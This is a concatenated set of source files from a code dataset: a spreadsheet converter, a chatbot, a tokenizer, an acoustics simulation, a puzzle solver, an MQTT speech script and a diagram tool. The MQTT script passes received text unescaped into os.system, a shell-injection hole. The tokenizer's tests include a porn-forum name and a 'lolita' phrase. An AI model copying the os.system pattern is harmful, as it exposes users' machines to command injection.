14, 15, 18]\r\n for row in xrange(nrows):\r\n if row < titleIncluded:\r\n continue\r\n \r\n obj = DataObject()\r\n obj.insurance_type = sheet.cell_value(row, offsets[0])\r\n obj.insurance_name = sheet.cell_value(row, offsets[1])\r\n obj.order_date = self._preprocess_date(sheet.cell(row, offsets[2]).ctype, sheet.cell_value(row, offsets[2]))\r\n obj.insurance_premium = sheet.cell_value(row, offsets[3])\r\n obj.insurance_commission = sheet.cell_value(row, offsets[4])\r\n obj.staff_no = sheet.cell_value(row, offsets[5])\r\n# print(obj)\r\n self._queue.put(obj)\r\n time.sleep(random.random() / 10)\r\n print('[->| ] Sheet [%s].[%s], Rows [%d] End' % (file, sheet.name, (nrows + 1 - titleIncluded)))\r\n print('[->| ] Workbook [%s] End' % (file))\r\n\r\nclass QueueReadProcess(VProcess):\r\n def run(self):\r\n time.sleep(2)\r\n dst_name = '车享家保单.xls'\r\n print('[ |->] PID [%s]: %s is running...' % (os.getpid(), self.name))\r\n \r\n workbook = xlwt.Workbook(encoding='utf-8')\r\n sheet = workbook.add_sheet('sheet1', cell_overwrite_ok=True)\r\n header, shape = self._init_header()\r\n row_cnt = 0\r\n \r\n for row in xrange(shape[0]):\r\n for col in xrange(shape[1]):\r\n sheet.write(row_cnt, col, label=header[row][col])\r\n row_cnt += 1\r\n \r\n while not self._queue.empty():\r\n obj = self._queue.get(True)\r\n# print('Get from queue [%s, %s, %s, %s]' % (obj.insurance_name, obj.insurance_type, obj.insurance_premium, obj.insurance_commission))\r\n \r\n sheet.write(row_cnt, 0, label=obj.order_date)\r\n sheet.write(row_cnt, 1, label=obj.insurance_name)\r\n sheet.write(row_cnt, 2, label=obj.insurance_type)\r\n sheet.write(row_cnt, 3, label=obj.insurance_premium)\r\n sheet.write(row_cnt, 4, label=obj.insurance_commission)\r\n sheet.write(row_cnt, 5, label=obj.staff_no)\r\n \r\n print('[ |->] Task Done [%d], Task Queued [%d]' % ((row_cnt + 1 - shape[0]), self._queue.qsize()))\r\n row_cnt += 1\r\n time.sleep(random.random() / 5)\r\n \r\n print('[ |->] Saving excel file [%s] to disk ...' 
% os.path.join(self._path, dst_name))\r\n workbook.save(os.path.join(self._path, dst_name))\r\n print('[ |->] Excel file [%s] saved' % os.path.join(self._path, dst_name))\r\n\r\n def _init_header(self):\r\n headers = [['col1', 'col2', 'col3', 'col4', 'col5', 'col6'],\r\n ['varchar2', 'varchar2', 'varchar2', 'varchar2', 'varchar2', 'varchar2'],\r\n ['2018-06-05', 'demo', '商业', 'demo', 'demo', 'demo'],\r\n ['签单日期', '保险公司名称', '险种', '含税保费', '手续费金额', '员工工号']\r\n ]\r\n return headers, (len(headers), len(headers[0]))\r\n\r\nclass BatchProcessManager(object):\r\n def __init__(self, from_path, to_path):\r\n self._queue = Queue()\r\n self._writer = QueueWriteProcess('Writer', self._queue, from_path)\r\n self._reader = QueueReadProcess('Reader', self._queue, to_path)\r\n \r\n def run(self):\r\n self._writer.start()\r\n self._reader.start()\r\n \r\n self._writer.join()\r\n self._reader.join()\r\n\r\n \r\nif __name__=='__main__':\r\n parser = argparse.ArgumentParser(description='Insurance Data Process Helper:')\r\n parser.add_argument('--src', type=str, default=os.path.join('.', 'src'), dest='src', help='source file path')\r\n parser.add_argument('--dst', type=str, default=os.path.join('.', 'dst'), dest='dst', help='target file path')\r\n args = parser.parse_args()\r\n \r\n# os.makedirs(args.dst)\r\n \r\n manager = BatchProcessManager(args.src, args.dst)\r\n manager.run()","sub_path":"src/insurance_data_converse.py","file_name":"insurance_data_converse.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243915738","text":"import json, re, pprint, requests\nfrom Groofy.settings import fb_settings\n\nPAGE_ACCESS_TOKEN = fb_settings['PAGE_ACCESS_TOKEN']\nVERIFY_TOKEN = fb_settings['VERIFY_TOKEN']\n\ndef reply(fbid, msg):\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\n response_msg = json.dumps({\"recipient\":{\"id\":fbid}, \"message\":msg})\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\n print('='*40 + 'REPLY STARTS' + '='*40); pprint.pprint(msg); print('='*40 + 'REPLY ENDS ' + '='*40)\n pprint.pprint(status.json()); print('RESPONSE FROM FACEBOOK ENDS' + '='*65)\n return status\n","sub_path":"Groofy/utils/reply.py","file_name":"reply.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231898648","text":"# Copyright 2008-2013 the original author or authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport random\nimport re\n\nfrom pubbot.conversation import chat_receiver\nfrom pubbot.education.models import Education\nfrom pubbot.ratelimit import enforce_rate_limit\n\n\n@chat_receiver(r\"^(?P.*)$\")\ndef lookup_education_response(sender, user, sentence, **kwargs):\n replies = []\n\n for module in Education.objects.all():\n if module.regex:\n regex = module.trigger\n else:\n regex = 
r'\\b%s\\b' % re.escape(module.trigger)\n\n result = re.search(regex, sentence.lower())\n if result:\n replies.append((module, result.groupdict()))\n\n if len(replies) == 0:\n return\n\n return choose_education_response(user=user, responses=replies)\n\n\n@enforce_rate_limit(\"1/15s\", limit_by=['user'])\n@enforce_rate_limit(\"10/10m\")\ndef choose_education_response(user, responses, **kwargs):\n response, args = random.choice(responses)\n\n if random.random() >= response.probability:\n return\n\n # Build a reply using common fields and values matched in regex\n metadata = {'nick': user}\n metadata.update(kwargs)\n metadata.update(args)\n\n reply = response.response % metadata\n\n return {\n 'content': reply,\n }\n","sub_path":"pubbot/education/receivers.py","file_name":"receivers.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52556303","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\nimport re\nimport itertools\nimport opencc\nimport jieba\n# from pyhanlp import *\nimport MeCab\nimport os\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\njieba.load_userdict(os.path.join(basedir, '../data/dict/words.txt'))\n\n# chinese\nchinese_ranges = [\n ('\\u2E80', '\\u2EFF'),\n ('\\u2F00', '\\u2FDF'),\n ('\\u3400', '\\u4DBF'),\n ('\\u4e00', '\\u62FF'),\n ('\\u6300', '\\u77FF'),\n ('\\u7800', '\\u8CFF'),\n ('\\u8D00', '\\u9FCC'),\n\n ('\\U00020000', '\\U000215FF'),\n ('\\U00021600', '\\U000230FF'),\n ('\\U00023100', '\\U000245FF'),\n ('\\U00024600', '\\U000260FF'),\n ('\\U00026100', '\\U000275FF'),\n ('\\U00027600', '\\U000290FF'),\n ('\\U00029100', '\\U0002A6DF'),\n ('\\U0002A700', '\\U0002B734'),\n ('\\U0002B740', '\\U0002B81D'),\n ('\\U0002B820', '\\U0002CEAF'),\n ('\\U0002CEB0', '\\U0002EBEF'),\n ('\\U0002F800', '\\U0002FA1F')\n ]\n\n# japanese\n# https://www.key-shortcut.com/en/writing-systems/%E3%81%B2%E3%82%89%E3%81%8C%E3%81%AA-japanese\nhiragana = [('\\u3040', '\\u309F')]\nkatakana = [('\\u30A0', '\\u30FF')]\nkatakana_phonetic = [('\\u31F0', '\\u31FF')]\nkanbun = [('\\u3190', '\\u319F')]\nhalf_width = [('\\uFF65', '\\uFF9F')]\n\n# korean\n# https://www.key-shortcut.com/en/writing-systems/%ED%95%9C%EA%B5%AD-korean-script/hangul-characters-1\nkorean_ranges = [\n ('\\u1100', '\\u11FF'), # Hangul Jamo\n ('\\u3130', '\\u318F'), # Hangul Compatibility Jamo\n ('\\uA960', '\\uA97F'), # Hangul Jamo Extended-A\n]\n\ncyrillic_ranges = [\n ('\\u0400', '\\u04FF'),\n ('\\u0500', '\\u052F'),\n ('\\u2DE0', '\\u2DFF'),\n ('\\uA640', '\\uA69F')\n]\n\ndef make_pattern(ranges):\n return r'([%s]+)' % (''.join(['%s-%s' % (f, s) for f, s in ranges]))\n\n\nchinese_pattern = make_pattern(chinese_ranges)\n\njapanese_pattern = make_pattern(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges)))\nenglish_pattern = r'((?:[a-zA-Z]+[,.\\-: ()&])?[a-zA-Z0-9]+)'\n\nkorean_pattern = make_pattern(korean_ranges)\n\ncyrillic_word = r'(?:[%s]+)' % (''.join(['%s-%s' % (f, s) for f, s in cyrillic_ranges]))\ncyrillic_pattern = r'(%s(?:[ \\-.]%s)+)' % (cyrillic_word, cyrillic_word)\n\n\ntradition2simple = opencc.OpenCC('t2s')\n\nwakati = MeCab.Tagger(\"-Owakati\")\n\n\ndef preprocess(lang: str, phrases):\n if lang == 'chinese':\n return [' '.join([term for term in jieba.cut(tradition2simple.convert(p))]) for p in phrases]\n elif lang == 'japanese':\n return [wakati.parse(p).split() for p in phrases]\n elif lang == 'english':\n return [re.sub(r'[,.\\-:()]', ' ', 
phrase).lower() for phrase in phrases]\n # elif lang == 'korean':\n else:\n return phrases\n\n\ndef extract(text: str):\n chinese_phrases = re.findall(chinese_pattern, text, re.UNICODE)\n japanese_phrases = [p for p in re.findall(japanese_pattern, text, re.UNICODE) if p not in chinese_phrases]\n\n chinese_phrases = [tradition2simple.convert(p) for p in chinese_phrases]\n english_phrases = re.findall(english_pattern, text, re.UNICODE)\n korean_phrases = re.findall(korean_pattern, text, re.UNICODE)\n cyrillic_phrases = re.findall(cyrillic_pattern, text, re.UNICODE)\n\n return {\n 'chinese': preprocess('chinese', chinese_phrases),\n 'japanese': preprocess('japanese', japanese_phrases),\n 'english': preprocess('english', english_phrases),\n 'korean': preprocess('korean', korean_phrases),\n 'cyrillic': preprocess('cyrillic', cyrillic_phrases)\n }\n\n\nword_pattern = make_pattern(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges,\n korean_ranges, cyrillic_ranges, [('a', 'z'), ('A', 'Z')])))\n\n\ndef contain(ranges, c):\n for start, end in ranges:\n if start <= c <= end:\n return True\n return False\n\n\ndef tokenize(text: str):\n def _tokenize(text: str):\n start = 0\n while start < len(text):\n end = start\n lang = 'unknown'\n\n if '0' <= text[end] <= '9':\n while end < len(text) and '0' <= text[end] <= '9':\n end += 1\n lang = 'number'\n elif 'a' <= text[end].lower() <= 'z':\n # ENGLISH\n while end < len(text) and 'a' <= text[end].lower() <= 'z':\n end += 1\n lang = 'english'\n\n elif contain(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges)), text[end]):\n # CJK\n while end < len(text) and contain(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges)), text[end]):\n end += 1\n lang = 'cjk'\n\n if lang == 'cjk':\n for c in text[start:end]:\n if not contain(chinese_ranges, c):\n lang = 'japanese'\n break\n else:\n lang = 'chinese'\n elif contain(korean_ranges, text[end]):\n # KOREAN\n while end < len(text) and contain(korean_ranges, text[end]):\n end += 1\n lang = 'korean'\n elif contain(cyrillic_ranges, text[end]):\n # cyrillic\n while end < len(text) and contain(cyrillic_ranges, text[end]):\n end += 1\n lang = 'cyrillic'\n\n if end > start:\n yield lang, text[start:end]\n start = end\n else:\n yield lang, text[start:start+1]\n start += 1\n\n words = []\n for lang, word in _tokenize(text):\n if lang == 'chinese':\n words.extend(jieba.cut(tradition2simple.convert(word)))\n elif lang == 'japanese':\n words.extend([tradition2simple.convert(w) for w in wakati.parse(word).split()])\n elif lang == 'english':\n hump_pattern = r'([A-Z][a-z]+){2,}'\n if re.fullmatch(hump_pattern, word):\n words.extend([sub.lower() for sub in re.findall(r'[A-Z][a-z]+', word)])\n else:\n words.append(word.lower())\n else:\n words.append(word)\n\n return [w for w in words if w not in '._-+&@()[]()【】「」=、/\\\\, \\t\\'\\\"#!~`::']\n\nif __name__ == '__main__':\n print(extract('南河茜(仲村みう,なかむらみう),日本女演员,2017年出道。'))\n print(extract('南河茜(仲村みう,なかむらみう),日本女演员,2017年出道。'))\n print(extract('Anri Sugihara 杉原杏璃 - 東京アンリ Blu-ray'))\n print(extract('60 минут по горячим следам (дневной выпуск в 12_50) от 01.07.19.mp4'))\n\n print(tokenize('[Heavy Blues] Lonely Kamel 2008-2014 (Jamal The Moroccan)'))\n print(tokenize('Luther Wright & The Wrongs - Rebuild The Wall - 2001'))\n print(tokenize('한국 & 외국 영화 엑기스 모음 3 Edited By HHan'))\n 
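# added smoke test (not from the original set): four scripts mixed in one string\n    print(tokenize('hello世界 2020 тест'))\n    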
print(tokenize('Antman.And.The.Wasp.2018.TRUEFRENCH.HDRiP.MD.XViD-STVFRV.avi'))\n print(tokenize('みまさか(iuu05.com)欧美萝莉-西洋萝莉 lolita -ロリ'))\n print(tokenize('[190619]逢田梨香子 1st EP「Principal」(CD+DVD初回限定盤)[320K].rar'))\n print(tokenize('ymdha@草榴社區@MOKO美空徐莹私拍套图'))\n print(tokenize('请所有支持热爱色中色的会员互相转帖告知!让世人知道真相。916事件'))\n\n print(tokenize('六月最爱'))","sub_path":"parser/lang.py","file_name":"lang.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507814877","text":"import numpy as np\nimport json\nfrom dataclasses import dataclass\nimport matplotlib.pyplot as plt\n\n# @dataclass\n# class diffusorParameters:\n\n@dataclass\nclass SimulationProperties:\n distanceBetweenSoundSourceAndProbe: float # r0\n distanceBetweenMicrophonesAndProbe: float # r\n\n@dataclass\nclass DiffusorProperties:\n algorithm: staticmethod\n modulo: int\n soundSpeed: float\n frequencyStart: float\n numberOfElements: int\n elementWidth: float\n angle: float\n samplesPerElement: int\n\n def createDiffusorSequence(self) -> list:\n return [((self.algorithm(x)) % self.modulo)\n * self.soundSpeed / self.frequencyStart / 2 / self.modulo\n for x in range(1, self.numberOfElements + 1)]\n\n def getMinimumWaveLength(self):\n return self.elementWidth / 2\n\n def calculateK(self, frequency):\n return 2 * np.pi * frequency / self.soundSpeed\n\n\nclass Diffusor:\n def __init__(self, diffusorProperties: DiffusorProperties, diffusorAngleSequence: list):\n self.sequence = diffusorProperties.createDiffusorSequence()\n self.diffusorProperties = diffusorProperties\n self.diffusorAngleSequence = diffusorAngleSequence\n\n assert len(self.sequence) == len(diffusorAngleSequence)\n\n self.renderDiffusorFunction()\n\n def createRamp(self, width: float, baseLevel: float, side: str, n: int):\n const = np.tan(self.diffusorProperties.angle)\n tempY = list()\n for index in range(n):\n tempX = index * width / n\n tempY.append(const * tempX)\n tempY = np.array(tempY) if side == 'L' else np.flip(np.array(tempY))\n return baseLevel + tempY\n\n def renderDiffusorFunction(self):\n self.y = np.array([])\n for index, level in enumerate(self.sequence):\n self.y = np.append(self.y, self.createRamp(\n self.diffusorProperties.elementWidth,\n level,\n self.diffusorAngleSequence[index],\n self.diffusorProperties.samplesPerElement))\n\n self.x = (np.arange(len(self.y)) / len(self.y) - 0.5) * \\\n self.diffusorProperties.elementWidth * self.diffusorProperties.numberOfElements\n print(\"Diffusor function was rendered!\")\n\ndef angles():\n return np.arange(0, np.pi, np.pi/180)\n\ndef R(k, currentHeight):\n return np.exp(-1j * k * 2 * currentHeight)\n\n\ndef alpha(k, r, r0):\n return -1j * k / (8 * np.pi ** 2) * np.exp(-1j * k * (r + r0))\n\n\ndef beta(k, b, r, phi):\n return np.sinc(k * b / r) * (np.cos(phi) + 1) # (1 + cos(phi)) directivity term\n\ndef calculateIntegral(x: np.array, values: list) -> float:\n sum = 0\n for xIndex in range(1, len(x)):\n currentXHeight = abs(x[xIndex] - x[xIndex-1])\n tempSurface = 1 / 2 * (values[xIndex] + values[xIndex-1]) * currentXHeight\n sum += tempSurface\n return sum\n\n\ndef gamma(k, x: np.array, phi, y: np.array):\n values = list()\n for index, singleX in enumerate(x):\n temp = R(k, y[index]) * np.exp(1j * k * singleX * np.sin(phi))\n values.append(temp)\n return calculateIntegral(x, values)\n\n\nif __name__ == \"__main__\":\n diffusorProperties = DiffusorProperties(\n algorithm=lambda x: x**5,\n modulo=23,\n soundSpeed=343.6,\n frequencyStart=500,\n numberOfElements=46,\n        
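# 46 wells of 0.021739 m each give a panel almost exactly 1 m wide\n        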
elementWidth=0.021739,\n angle=np.pi/6,\n samplesPerElement=30)\n\n simulationProperties = SimulationProperties(10, 5)\n\n sequence = diffusorProperties.createDiffusorSequence()\n\n diffusorAngleSequence = ['L', 'R', 'L', 'R', 'R', 'R', 'R', 'R',\n 'L', 'L', 'R', 'L', 'R', 'L', 'R', 'R',\n 'R', 'L', 'R', 'L', 'R', 'L', 'R', 'L',\n 'R', 'L', 'L', 'L', 'R', 'L', 'L', 'R',\n 'R', 'L', 'L', 'L', 'R', 'R', 'R', 'L',\n 'R', 'L', 'L', 'R', 'L', 'L']\n\n diffusor = Diffusor(diffusorProperties, diffusorAngleSequence)\n\n frequencies = [100, 125, 160, 200, 250,\n 315, 400, 500, 630, 800,\n 1000, 1250, 1600, 2000, 2500]\n\n results = dict() \n for freq in frequencies:\n print(f\"calculating frequency {freq} Hz\")\n k = diffusorProperties.calculateK(freq)\n # alpha(k, r, r0): r is the microphone distance, r0 the source distance\n firstPart = alpha(k, simulationProperties.distanceBetweenMicrophonesAndProbe,\n simulationProperties.distanceBetweenSoundSourceAndProbe)\n\n sizeOfDiffusor = max(diffusor.x)\n \n phases = dict()\n for phase in np.arange(0, np.pi, np.pi/180):\n second = beta(k, sizeOfDiffusor, simulationProperties.distanceBetweenMicrophonesAndProbe, phase)\n third = gamma(k, diffusor.x, phase, diffusor.y) \n phases[phase] = np.real(np.abs(firstPart * second * third))\n\n results[freq] = phases\n \n endResult = {\"values\": list(), \"frequencies\": list(), \"parameterName\" : \"Acoustic Diffusion Coefficient\"}\n for freq in results.keys():\n tempResult = list(results[freq].values())\n print(tempResult)\n first = np.square(np.sum(tempResult))\n second = np.sum(np.square(tempResult))\n third = (len(tempResult) - 1) * second\n endResult[\"frequencies\"].append(freq)\n endResult[\"values\"].append((first - second) / third)\n\n print(json.dumps(endResult, indent=3))\n \n plt.plot(endResult[\"frequencies\"], endResult[\"values\"])\n plt.show()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14680447","text":"#!/bin/env python3\n\nwith open(\"input\") as f:\n text = f.read()\n\ntiles_s = text.split(\"\\n\\n\")\n\n\ndef fliph(tile):\n return [\"\".join(reversed(x)) for x in tile]\n\ndef transpose(tile):\n return [\"\".join(x) for x in zip(*tile)]\n\ndef rotations(tile):\n rot = [tile]\n for _ in range(3):\n rot.append(fliph(transpose(rot[-1])))\n return rot\n\ndef perm(tile):\n return rotations(tile) + rotations(fliph(tile))\n\n\ntiles = {}\nfor ts in tiles_s:\n n, *tile = ts.strip().split(\"\\n\")\n n = int(n[5:-1])\n tiles[n] = perm(tile)\n\n\nsidelen = int(len(tiles) ** 0.5)\nsolution = [[0] * sidelen for _ in range(sidelen)]\n\nstack = list(reversed([(row, col) for col in range(sidelen) for row in range(sidelen)]))\n\ndef solve():\n if len(stack) == 0:\n return True\n row, col = stack.pop()\n tids = list(tiles.keys())\n for tid in tids:\n perm = tiles[tid]\n del tiles[tid]\n for p in perm:\n if row > 0:\n if not solution[row-1][col][1][-1] == p[0]:\n continue\n if col > 0:\n if not [x[-1] for x in solution[row][col-1][1]] == [x[0] for x in p]:\n continue\n solution[row][col] = (tid, p)\n if solve():\n return True\n tiles[tid] = perm\n stack.append((row, col))\n\nsolve()\n\nprint(solution[0][0][0] * solution[0][-1][0] * solution[-1][0][0] * solution[-1][-1][0])\n\ndef no_border(tile):\n return [row[1:-1] for row in tile[1:-1]]\n\nn_b_tiles = []\nfor tr in solution:\n a = []\n for i, tile in tr:\n a.append(no_border(tile))\n n_b_tiles.append(a)\n\n\nsidelength = len(n_b_tiles) * len(n_b_tiles[0][0])\ntile_sl = 
len(n_b_tiles[0][0])\nimage = [[0 for _ in range(sidelength)] for x in range(sidelength)]\n\nfor nrow, trow in enumerate(n_b_tiles):\n for ncol, tile in enumerate(trow):\n for ty, row in enumerate(tile):\n for tx, char in enumerate(row):\n y = (tile_sl*nrow)+ty\n x = (tile_sl*ncol)+tx\n image[y][x] = char\n\nfor row in image:\n print(\"\".join(row))\n\nmonster = [\n\" # \",\n\"# ## ## ###\",\n\" # # # # # # \",\n]\n\nmatches = 0\n\nfor p in perm(image):\n #if matches > 0:\n # break\n for y_base in range(len(image)-len(monster)):\n for x_base in range(len(image[0])-len(monster[0])):\n match = True\n for y in range(len(monster)):\n for x in range(len(monster[0])):\n if monster[y][x] == \"#\" and image[y_base+y][x_base+x] != \"#\":\n match = False\n break\n if not match:\n break\n if match:\n matches += 1\n\nn_sharp = sum([\"\".join(row).count(\"#\") for row in image])\nn_monster = sum([row.count(\"#\") for row in monster])\nprint(n_sharp-n_monster * matches)\n","sub_path":"day20/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612242771","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python \n#coding=utf-8\nimport time\nimport json\nimport os\nimport speech_recognition as sr\nfrom espeak import espeak\nfrom lib import qiot\n\n\"\"\"\n requirement:\n -- pip install paho-mqtt\n run command: python mqtt.py\n\"\"\"\n\n\"\"\"\n Setup connection options\n\"\"\"\nconnection = None\nconnection = qiot.connection(qiot.protocol.MQTT)\nconnection_options = connection.read_resource('./res/resourceinfo.json', '/ssl/')\n\n\"\"\"\n Send data to QIoT Suite Lite.\n\"\"\"\n\nr = sr.Recognizer()\nsr.operation_timeout = 5\n#sr.dynamic_energy_threshold = True\n\ndef speak_text(text):\n\tcommand_speak = 'espeak -s 200 -v en+f3 \\\"' + text +'\\\"'\n\tos.system(command_speak)\n\ndef speech(audio_in):\n try:\n text = r.recognize_google(\n audio_in, key=None, language=\"en-US\", show_all=False)\n print(\"Google Speech Recognition thinks you said \" + text)\n connection.publish_by_id(\"echotext\", text)\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n\ndef on_message(event_trigger, data):\n message = json.loads(data[\"message\"].payload)\n if(data['id'] == 'action'):\n print( \"action : \" + str(message['value']))\n print( \"------------------------\")\n if(message['value'] == 1):\n with sr.Microphone() as source:\n print(\"Say something!\")\n audio = r.listen(source)\n speech(audio)\n if(data['id'] == 'playMusic'):\n print( \"playMusic : \" + str(message['value']))\n print( \"------------------------\")\n if(message['value']['command'] == \"play\"):\n play_music('/Multimedia/test2.mp3')\n if(message['value']['command'] == \"stop\"):\n stop_music()\n if(data['id'] == 'speak'):\n print(\"speak : \" + message['value'])\n print( \"------------------------\")\n speak_text(message['value'].encode('utf8'))\n\ndef on_connect(event_trigger, data):\n print(\"client ready\")\n connection.subscribe_by_id(\"action\")\n connection.subscribe_by_id(\"echotext\")\n connection.subscribe_by_id(\"speak\")\n\nconnection.on(\"connect\", on_connect)\nconnection.on(\"message\", on_message)\nconnection.connect(connection_options)\n\nwhile 1:\n pass\n 
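# keep-alive loop: block the main thread so the connection's message callbacks keep firing\n    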
time.sleep(0.1)","sub_path":"speak/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"618624808","text":"import cairosvg\nimport svgwrite as svg\nimport sys\n\ndef split(line):\n\tL1=line.replace(';','|')\n\tL2=L1.split('|')\n\tL3=[L.split(',') for L in L2]\n\treturn L3,['#FFFFFF' for i in L3]\n\n\ndef drawStack(ofnamePrefix,stack,cols,prms):\n\tif len(stack)==0:\n\t\treturn\n\tofname='{}-{}.svg'.format(ofnamePrefix,prms['ofsuffix'])\n\tdwg=svg.Drawing(ofname)\n\tw,h=prms['w'],prms['h']\n\tf=prms['fs']\n\tgx,gy=prms['gx'],prms['gy']\n\tl,L=prms['lw_block'],prms['lw_stack']\n\tD=prms['dir']\n\tN=sum([len(G) for G in stack])\n\n\tS='stroke-width:{};stroke:#000000;'.format(L)\n\tif D=='H':\n\t\tW,H=(gx+w)*N+gx,h+2*gy\n\t\tdwg.add(svg.shapes.Line(start=(-L/2,0),end=(W,0),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(-L/2,H),end=(W,H),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(0,0),end=(0,H),style=S))\n\telse:\n\t\tW,H=w+2*gx,(gy+h)*N+gy\n\t\tdwg.add(svg.shapes.Line(start=(0,0),end=(0,H+L/2),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(W,0),end=(W,H+L/2),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(0,H),end=(W,H),style=S))\n\t\n\ts='stroke-width:{};stroke:#000000;'.format(l)\n\tts='text-anchor:middle;alignment-baseline:middle;font-size:{}pt;font-family:monospace;'.format(f)\n\tn=1\n\tfor ig in range(len(stack)):\n\t\tcol=cols[ig]\n\t\tG=stack[ig]\n\t\tfor v in G:\n\t\t\tif D=='H':\n\t\t\t\tx,y=(n-1)*(gx+w)+gx,gy\n\t\t\telse:\n\t\t\t\tx,y=gx,H-n*(gy+h)\n\t\t\tdwg.add(svg.shapes.Rect(insert=(x,y),size=(w,h),fill=col,style=s))\n\t\t\tdwg.add(svg.text.Text(text=v,insert=(x+w/2,y+h/2),style=ts))\n\t\t\tn+=1\n\tdwg.save()\n\tcairosvg.svg2png(url=ofname,write_to=ofname[:-4]+'.png',parent_width=W,parent_height=H)\n\ncolors={'w':'#FFFFFF',\n\t\t'r':'#FFCFCF',\n\t\t'y':'#FFFFCF',\n\t\t'g':'#CFFFCF',\n\t\t'c':'#CFFFFF',\n\t\t'b':'#CFCFFF',\n\t\t'm':'#FFCFFF',\n\t\t'o':'#FFCF7F',\n\t\t'k':'#CFCFCF'\n\t\t}\nif __name__=='__main__':\n\tif len(sys.argv)<2:\n\t\tprint('Usage:')\n\t\tprint(' sys.argv[0] [inputFileName]')\n\t\tsys.exit()\n\tifname=sys.argv[1]\n\tofindex=0\n\tstack=[]\n\tcols=[]\n\tcnt=0\n\tprmsDef={'w':50,'h':30,'fs':16,'gx':6,'gy':4,'lw_block':1,'lw_stack':2,'ofsuffix':'','dir':'V'}\n\tprms=prmsDef.copy()\n\twith open(ifname,'r') as fptr:\n\t\tfor line in fptr:\n\t\t\tif len(line)>=2:\n\t\t\t\tif line[0]=='[':\n\t\t\t\t\tif prms['ofsuffix']=='':\n\t\t\t\t\t\tprms['ofsuffix']='{}'.format(ofindex)\n\t\t\t\t\tdrawStack(ifname,stack,cols,prms)\n\t\t\t\t\tstack,cols=split(line[1:-1])\n\t\t\t\t\tcnt=0\n\t\t\t\t\tofindex+=1\n\t\t\t\t\tprms['ofsuffix']=''\n\t\t\t\telif line[0]=='E':\n\t\t\t\t\tbreak\n\t\t\t\telif line[0]=='%':\n\t\t\t\t\tcontinue\n\t\t\t\telif line[0]=='P':\n\t\t\t\t\t# reconstructed from a garbled span: assumed to paint the next block group\n\t\t\t\t\tif cnt<len(cols):\n\t\t\t\t\t\tcols[cnt]=colors[line[1]]\n\t\t\t\t\t\tcnt+=1\n\t\t\t\telif line[0]=='W':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['w']=argint if argint>0 else prmsDef['w']\n\t\t\t\telif line[0]=='H':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['h']=argint if argint>0 else prmsDef['h']\n\t\t\t\telif line[0]=='X':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['gx']=argint if argint>0 else prmsDef['gx']\n\t\t\t\telif line[0]=='Y':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['gy']=argint if argint>0 else prmsDef['gy']\n\t\t\t\telif line[0]=='F':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['fs']=argint if argint>0 else prmsDef['fs']\n\t\t\t\telif line[0]=='L':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['lw_stack']=argint if argint>0 else prmsDef['lw_stack']\n\t\t\t\telif 
line[0]=='l':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['lw_block']=argint if argint>0 else prmsDef['lw_block']\n\t\tif True:\n\t\t\tif prms['ofsuffix']=='':\n\t\t\t\tprms['ofsuffix']='{}'.format(ofindex)\n\t\t\tdrawStack(ifname,stack,cols,prms)\n","sub_path":"stackVisualizer.py","file_name":"stackVisualizer.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62593129","text":"#! /usr/bin/python\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom pprint import pprint\nimport argparse\nimport logging\nimport sys\n\nimport nfc_comm\nimport packet\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--version', default=2, nargs='?', type=int)\n options = parser.parse_args()\n\n nfc = 